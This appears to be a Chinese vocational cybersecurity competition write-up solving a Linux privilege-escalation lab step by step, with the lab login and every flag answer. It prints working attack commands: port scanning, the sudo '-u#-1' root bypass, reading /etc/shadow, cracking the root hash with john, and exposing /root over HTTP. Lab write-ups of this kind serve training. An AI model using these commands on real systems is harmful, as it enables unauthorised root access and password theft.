2023年中职“网络安全“—Linux系统深入提权①

简介: 2023年中职“网络安全“—Linux系统深入提权①

Linux系统深入提权

任务环境说明:

  • 服务器场景:Server2204(关闭链接)
  • 用户名:hacker 密码:123456

1. 使用深入机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV 靶机IP            # -p- 扫描全部端口,-sV 版本探测

b9bac431026e8bca28e6771f8088b799.png

flag: 2283/tcp

2. 使用深入机对服务器信息收集,并将服务器中主机名称作为flag提交;

ssh hacker@靶机IP -p 2283 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -p 选择端口,-oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接
uname -a             # 查看系统基本信息

legacy.htmle9b37a8c162893d65b5dd814a88fc045.png

flag: KipZ1eze

3. 使用深入机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a             # 查看系统基本信息

5e177461d5a1ef887583f56e88a53a41.png

flag: 2.6.32-642.el6.x86_64

4. 使用深入机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

sudo -u#-1 bash                # sudo 版本小于1.8.28,当前用户存在于sudo权限列表

0054296a9eab723b8edfd072c8bb19ec.png

cd /root            # 进入root文件夹
ls -la              # 查看当前文件夹下的所有文件,并且以列表方式输出
cat key.txt         # 查看key.txt文本内容

4b2d54d9ad3aab78683adcd3a9ab2479.png

flag: 7QcSI8kK

5. 使用深入机对服务器管理员提权,并将服务器中root的密码作为flag提交;

cat /etc/shadow            # 查看root的shadow文件

05e4b1ce8d4418431d8a88bc08cf75cb.png

vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码

67b449c331c24879042eb342dc06dcac.png

lag: Woodrow

6. 使用深入机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

pwd                                # 查看当前目录
ls -la              # 查看当前文件夹下的所有文件,并且以列表方式输出
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务

642fde8bf3872c8ca073510f0892fb98.png

访问的时候一定要指定8080端口

d816d2d2e4dc81ec480bbb6574d9d599.png

flag: uB81UvW0


目录
相关文章
|
4天前
|
监控 安全 Linux
Linux系统的防御从多个方面来保护系统安全
防火墙:使用防火墙软件如iptables或Firewalld来限制网络流量,保护系统免受恶意网络攻击。
|
7月前
|
SQL 安全 数据库
黑客关键技术操作系统提权的N种姿势
黑客关键技术操作系统提权的N种姿势
|
10月前
|
前端开发 Linux 网络安全
Linux系统之网络安全管理
Linux系统之网络安全管理
161 0
|
4天前
|
存储 监控 Linux
【亮剑】在Linux系统中,有一个特殊的目录经常被用户和管理员所忽视——/tmp。
【4月更文挑战第30天】`/tmp`目录在Linux系统中扮演着重要角色,用于存储临时文件,涉及程序运行、系统操作、用户文件及网络通信。它在系统维护、软件开发、数据处理和网络操作等场景中广泛应用。为保障系统稳定和数据安全,需进行权限控制、定期清理、设置磁盘配额、安全审计以及用户教育。理解和管理`/tmp`目录对于优化系统性能和防范风险至关重要。
|
5月前
|
网络协议 Linux 测试技术
2023年中职“网络安全“—Linux系统深入提权②
2023年中职“网络安全“—Linux系统深入提权②
58 0
|
5月前
|
网络协议 Linux 网络安全
2023年中职“网络安全“—Linux系统深入提权③
2023年中职“网络安全“—Linux系统深入提权③
67 2
|
安全 Linux 数据安全/隐私保护
带你读《Linux系统安全:纵深防御、安全扫描与入侵检测》之一:Linux系统安全概述
这是一部从技术原理、工程实践两个方面系统、深入讲解Linux系统安全的著作,从纵深防御、安全扫描、入侵检测3个维度细致讲解了如何构建一个如铜墙铁壁般的Linux防护体系。作者是资深的Linux系统安全专家、运维技术专家,有13年的从业经验,厚积薄发。本书得到了来自腾讯、阿里等知名企业的多位行业专家的高度评价。全书不仅包含大量工程实践案例,而且为各种核心知识点绘制了方便记忆的思维导图。
|
网络虚拟化 安全 网络安全
带你读《Linux系统安全:纵深防御、安全扫描与入侵检测》之三:虚拟专用网络
这是一部从技术原理、工程实践两个方面系统、深入讲解Linux系统安全的著作,从纵深防御、安全扫描、入侵检测3个维度细致讲解了如何构建一个如铜墙铁壁般的Linux防护体系。作者是资深的Linux系统安全专家、运维技术专家,有13年的从业经验,厚积薄发。本书得到了来自腾讯、阿里等知名企业的多位行业专家的高度评价。全书不仅包含大量工程实践案例,而且为各种核心知识点绘制了方便记忆的思维导图。
|
网络安全 网络协议 安全
带你读《Linux系统安全:纵深防御、安全扫描与入侵检测》之二:Linux网络防火墙
这是一部从技术原理、工程实践两个方面系统、深入讲解Linux系统安全的著作,从纵深防御、安全扫描、入侵检测3个维度细致讲解了如何构建一个如铜墙铁壁般的Linux防护体系。作者是资深的Linux系统安全专家、运维技术专家,有13年的从业经验,厚积薄发。本书得到了来自腾讯、阿里等知名企业的多位行业专家的高度评价。全书不仅包含大量工程实践案例,而且为各种核心知识点绘制了方便记忆的思维导图。
|
安全 Linux Apache
一次Linux系统被攻击的分析过程
IT行业发展到现在,安全问题已经变得至关重要,从最近的“棱镜门”事件中,折射出了很多安全问题,信息安全问题已变得刻不容缓,而做为运维人员,就必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先要站在攻击者的角度思考问题,修补任何潜在的威胁和漏洞。
1293 0